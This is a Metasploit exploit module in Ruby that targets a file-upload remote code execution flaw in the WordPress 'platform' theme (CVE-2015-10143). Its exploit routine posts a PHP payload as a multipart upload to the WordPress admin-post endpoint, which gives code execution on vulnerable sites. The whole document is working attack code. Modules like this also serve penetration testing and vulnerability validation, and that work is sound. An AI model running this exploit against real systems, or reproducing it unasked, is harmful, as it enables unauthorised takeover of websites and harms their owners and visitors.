##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Platform Theme File Upload Vulnerability',
        'Description' => %q{
          The WordPress Theme "platform" contains a remote code execution vulnerability
          through an unchecked admin_init call. The theme includes the uploaded file
          from its temp filename with php's include function.
        },
        'Author' => [
          'Marc-Alexandre Montpas', # initial discovery
          'Christian Mehlmauer' # metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2015-10143'],
          ['URL', 'http://blog.sucuri.net/2015/01/security-advisory-vulnerabilities-in-pagelinesplatform-theme-for-wordpress.html'],
          ['WPVDB', '7762']
        ],
        'Privileged' => false,
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [['platform < 1.4.4, platform pro < 1.6.2', {}]],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2015-01-21',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def exploit
    filename = "Settings_#{rand_text_alpha(5)}.php"

    data = Rex::MIME::Message.new
    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"file\"; filename=\"#{filename}\"")
    data.add_part('settings', nil, nil, 'form-data; name="settings_upload"')
    data.add_part('pagelines', nil, nil, 'form-data; name="page"')
    post_data = data.to_s

    print_status("Uploading payload")
    send_request_cgi({
      'method' => 'POST',
      'uri' => wordpress_url_admin_post,
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => post_data
    }, 5)
  end
end
